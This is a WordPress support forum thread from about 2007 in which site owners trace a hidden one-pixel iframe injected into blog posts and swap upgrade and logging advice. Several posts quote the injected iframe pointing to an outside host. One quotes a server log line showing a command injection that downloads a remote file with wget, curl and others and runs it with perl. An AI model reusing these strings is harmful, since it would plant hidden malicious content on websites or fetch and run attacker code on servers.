WordPress.org

Ready to get started?Download WordPress

Forums

124

iframe injection problem? (92 posts)

  1. lostplay
    Member
    Posted 6 years ago #

    Hi,

    I've searched around for a resolution to my problem but the closet thread I can find is this: http://wordpress.org/support/topic/89912?replies=4

    Basically about a week ago my site began experiencing problems whenever I tried to access the home page >http://www.heroes-hype.com. The screen just freezes for about 10 minutes..sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for http://xx.xx.xx.xx./iframe/wp-stats.php

    (the 'x' is an IP address which I don't recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)..I also tried other themes and browsers, but a wee alter and the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    "Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress -- which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either WordPress itself or the theme you're using (which has also been called into question as of late)."

    So now i'm wondering whether anyone can corroborate that this is the likely reason..and whether they is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..or will it?

    Any advise would be much appreciated.

    PS I am using the CSS Freak theme.

  2. whooami
    Member
    Posted 6 years ago #

    what is the xx.xx...

    and you say the problem persists, after removing the stats plugin? I dont see the code on your site.

    Without seeing the xx.xx.xx.xx.. its hard to say much.

  3. whooami
    Member
    Posted 6 years ago #

    http://61.132.75.71/iframe/wp-stats.php

    that? that goes to China, thats prolly not good.

  4. lostplay
    Member
    Posted 6 years ago #

    Hi,

    Yes, that's the IP address..

    Yep, I removed the wp-stats plugin because I originally assumed it was at fault and because I wanted to ensure that I had covered the basics before asking for advice.

    Thanks for the feedback - do you (or anyone else) have any ideas on how to resolve this?

  5. whooami
    Member
    Posted 6 years ago #

    its not on your single post pages .. have you looked inside your theme files? I would start there with looking at index.php

    Look inside THIS post:

    http://heroes-hype.com/heroes-clues-global-tv-promo

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Step 1: Find where the code is being inserted. From what whooami is saying, it's likely inside the content of one specific post. So look through that post and find and remove it.

    Step 2: Upgrade to the current latest WordPress version (2.2.3). This has no known security issues at this time.

    Step 3: Keep up to date on WordPress releases. On the main dashboard, you'll always see new release information. Also, in WordPress 2.3 and up, WordPress itself will start telling you when your version is out of date and give you info on how to upgrade. So that will be good.

    Given that the code is inside a post's content, then I'd say yeah, they likely did it through the exploit in version 2.2. Upgrade to 2.2.3, right now.

  7. lostplay
    Member
    Posted 6 years ago #

    whooami - you're a star! There was the following iframe inside that post:

    <!-- Traffic Statistics -->
    <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    So does this mean they were attempting to track my stats/traffic? Hmm..very nasty stuff. I have now removed it from that post.

    Otto42 - thankyou for your help and advice also! I'm going to do as you advice and upgrade asap.

    Thanks again, I suspect that you have both saved me hours of stress!

  8. whooami
    Member
    Posted 6 years ago #

    So does this mean they were attempting to track my stats/traffic?

    who knows, it would almost be interesting to make up a site that forges a referer thats a wp blog and see if anything can be figured out. I really cant see anyway that they can gleam anything worthwhile.

  9. lostplay
    Member
    Posted 6 years ago #

    Hmm, it's a strange one indeed. Anyway thanks for the headsup :)

  10. Toread
    Member
    Posted 6 years ago #

    Happened today on 2.3.1 site. The injected code was:
    <!-- Traffic Statistics -->
    <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    Inside wp-stats.php is JavaScript code. Host 61.132.75.71 is in China. When can we expect a patch?

  11. scchu
    Member
    Posted 6 years ago #

    Yup. The same thing happened to me. Running 2.3. I thought it must've been exploit for 2.3. But it turns out 2.3.1 is also vulnerable. I am not feeling too comfortable with this actually. And I just noticed it in a post I did 2 days ago!! Now I gotta go back and dig them out... Argh...

  12. daxman
    Member
    Posted 6 years ago #

    Happened to me too.

  13. Chris Roberts
    Member
    Posted 6 years ago #

    Glad to find others discussing this. I've just noticed the same thing turning up in my blog, running v2.3. Was about to update to 2.3.1 but I see from comments on here that it is vulnerable as well.

    Any idea what hole these are crawling through?

  14. Chris Roberts
    Member
    Posted 6 years ago #

  15. Dion Hulse
    WordPress Dev
    Posted 6 years ago #

    Can anyone take a read through their webservers access logs and look for anything suspect accessing the admin pages?
    Also check for other users, and change the admin passwords.
    It is hard to work out what is happening here without knowing where the problem is coming from.

  16. Lloyd Budd

    Posted 6 years ago #

    Inserting an iframe of that style is the common injection by at least one black hat seo ring -- I've heard of that injection http://xx.xx.xx.xx./iframe/wp-stats.php being on on a Joomla! site.

    Columcille, it's still advisable to upgrade to 2.3.1 as it does address security issues. Including what WP theme, plugins, and other s/w is running on your host will help isolate the vector of the exploit.

  17. Chris Roberts
    Member
    Posted 6 years ago #

    Didn't mean to imply that I was going to delay an update. :) I did update to 1.3.1 but from other comments it seems to have the same problem.

    I've just done a little digging in my logs but haven't spotted anything yet. I'll keep looking.

  18. fermuned
    Member
    Posted 6 years ago #

    I suffer the same iframe injection using WP 2.2.2

    The iframe code was inserted inside the last post (I think that it could be important) and looking at the server logs nobody accessed to the admin part of WP neither to the single page of the post affected.

    The more strange lines of the servers logs are:
    1.-GET //wp-pass.php?_wp_http_referer=http://201.37.71.117:8090/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    2.-"OPTIONS / HTTP/1.1" 200 27903 "-" "Microsoft Data Access Internet Publishing Provider Cache Manager"

  19. aNieto2k
    Member
    Posted 6 years ago #

    I try use this code for inject something into posts, but it's I can't.

    I found a no good functionality in redirect, it's possible redirect to another web?

    http://youtblog.com?_wp_http_referer=http://www.google.com

    Why??

    I modify the wp_sanitize_redirect() to do more restrictive the redirection.

    function wp_sanitize_redirect($location) {
    	$location = preg_replace('|[^a-z0-9-~+_.?#=&;,/:%]|i', '', $location);
    	$location = wp_kses_no_null($location);
    /* Only redirections into the blog */
    if (stristr($location, "http://") && !eregi(get_option("home"),$location)) return get_option("home");</strong>
    /* Only redirection into the blog */
    	// remove %0d and %0a from location
    	$strip = array('%0d', '%0a');
    	$found = true;
    	while($found) {
    		$found = false;
    		foreach($strip as $val) {
    			while(strpos($location, $val) !== false) {
    				$found = true;
    				$location = str_replace($val, '', $location);
    			}
    		}
    	}
    	return $location;
    }

    Sorry for my English.

  20. pishmishy
    Member
    Posted 6 years ago #

    If you've been affected by this issue it would be very helpful if you can search through any MySQL logs you have to see if we can pin down where the code was inserted into the database.

    See http://trac.wordpress.org/ticket/5313

  21. Mdkart
    Member
    Posted 6 years ago #

    Same problem! Major security issue!

  22. pishmishy
    Member
    Posted 6 years ago #

    Mdkart, do you have any logs that may be useful to us?

  23. voiceofbragg
    Member
    Posted 6 years ago #

    I thing my site got one also, if you see some funky stuff

  24. pishmishy
    Member
    Posted 6 years ago #

    voiceofbragg, do you have logs from MySQL that may help us here?

  25. moshu
    Member
    Posted 6 years ago #

    Nope, he's just spamming the forum... [links from his post were deleted]

  26. Mdkart
    Member
    Posted 6 years ago #

    > pishmishy
    No mysql logs, I can't access to them on my server :(

  27. laslo
    Member
    Posted 6 years ago #

    I just found some code injected in a post from dec. 6th
    http://sintonizando.com/2007/12/06/ulrich-schnauss-elika-y-project-skyward-en-vivo-en-lima/

    some spam links hidden by this:

    <font style="position: absolute;overflow: hidden;height: 0;width: 0">

    I'm on WP 2.2
    Any ideas what to fix, or what to update?

  28. theapparatus
    Member
    Posted 6 years ago #

    Any ideas what to fix, or what to update?

    I'd just update the install as you're a few versions behind. It's up to 2.3.1 now.

  29. cbdilger
    Member
    Posted 6 years ago #

    I just found a post with this code injected with WP 2.2.3. I'm upgrading to 2.3.1 now and have contacted my ISP to see if MySQL logs are available. (Edit: no, logs aren't available; darned shared hosting.)

    Plugins:
    Edit Comments 0.3 beta
    Filosofo Comments Preview 0.7
    Spam Karma 2 2.2 r3

    Theme:
    extensively hacked version of kubrick

  30. Urosino
    Member
    Posted 6 years ago #

    Damn, I am having same problem. Just realized this in my source code:

    <!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

    Any solution yet!?

124

Topic Closed

This topic has been closed to new replies.

About this Topic